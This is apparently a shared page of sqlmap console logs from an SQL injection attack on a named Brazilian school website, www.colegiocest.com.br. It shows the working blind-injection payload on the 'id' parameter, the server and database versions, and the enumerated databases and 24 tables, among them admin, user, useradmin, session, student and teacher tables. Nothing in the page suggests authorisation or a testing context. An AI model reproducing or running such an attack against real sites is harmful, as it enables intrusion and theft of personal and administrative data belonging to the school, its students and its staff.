You are on page 1of 3

//OBTENDO A DBS ALVO

___
__H__
___ ___[.]_____ ___ ___ {1.1.9#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program

[*] starting at 15:25:53

[15:25:53] [INFO] resuming back-end DBMS 'mysql'


[15:25:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10' AND 8035=8035 AND 'KCJw'='KCJw
---
[15:25:53] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.38
back-end DBMS: MySQL 5
[15:25:53] [INFO] fetching database names
[15:25:53] [INFO] fetching number of databases
[15:25:53] [INFO] resumed: 2
[15:25:53] [INFO] resuming partial value: inform
[15:25:53] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval

[15:25:53] [INFO] retrieved: ation_schema

[15:26:06] [INFO] retrieved: colegiocest


available databases [2]:
[*] colegiocest
[*] information_schema

[15:26:17] [INFO] fetched data logged to text files under


'/root/.sqlmap/output/www.colegiocest.com.br'

[*] shutting down at 15:26:17

//Obtendo as Tabelas

__H__
___ ___[,]_____ ___ ___ {1.1.9#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program

[*] starting at 15:27:24

[15:27:24] [INFO] resuming back-end DBMS 'mysql'


[15:27:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10' AND 8035=8035 AND 'KCJw'='KCJw
---
[15:27:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.38
back-end DBMS: MySQL 5
[15:27:24] [INFO] fetching tables for database: 'colegiocest'
[15:27:24] [INFO] fetching number of tables for database 'colegiocest'
[15:27:24] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval

[15:27:24] [INFO] retrieved: 24

[15:27:26] [INFO] retrieved: admin

[15:27:30] [INFO] retrieved: agenda

[15:27:35] [INFO] retrieved: agendas

[15:27:37] [INFO] retrieved: albums

[15:27:41] [INFO] retrieved: albums_photos

[15:27:47] [INFO] retrieved: aluno

[15:27:50] [INFO] retrieved: cursos

[15:27:55] [INFO] retrieved: diariodeclasse

[15:28:06] [INFO] retrieved: downloads

[15:28:12] [INFO] retrieved: empregos

[15:28:19] [INFO] retrieved: evento

[15:28:27] [INFO] retrieved: info_uteis

[15:28:36] [INFO] retrieved: itenspergunta

[15:28:46] [INFO] retrieved: jornal

[15:28:51] [INFO] retrieved: noticia

[15:28:57] [INFO] retrieved: noticias

[15:28:59] [INFO] retrieved: perguntas


[15:29:06] [INFO] retrieved: pesquisa

[15:29:11] [INFO] retrieved: postagem_material

[15:29:24] [INFO] retrieved: professor

[15:29:31] [INFO] retrieved: session

[15:29:37] [INFO] retrieved: turma

[15:29:46] [INFO] retrieved: user

[15:29:51] [INFO] retrieved: useradmin


Database: colegiocest
[24 tables]
+-------------------+
| session |
| user |
| admin |
| agenda |
| agendas |
| albums |
| albums_photos |
| aluno |
| cursos |
| diariodeclasse |
| downloads |
| empregos |
| evento |
| info_uteis |
| itenspergunta |
| jornal |
| noticia |
| noticias |
| perguntas |
| pesquisa |
| postagem_material |
| professor |
| turma |
| useradmin |
+-------------------+

[15:29:56] [INFO] fetched data logged to text files under


'/root/.sqlmap/output/www.colegiocest.com.br'

[*] shutting down at 15:29:56

You might also like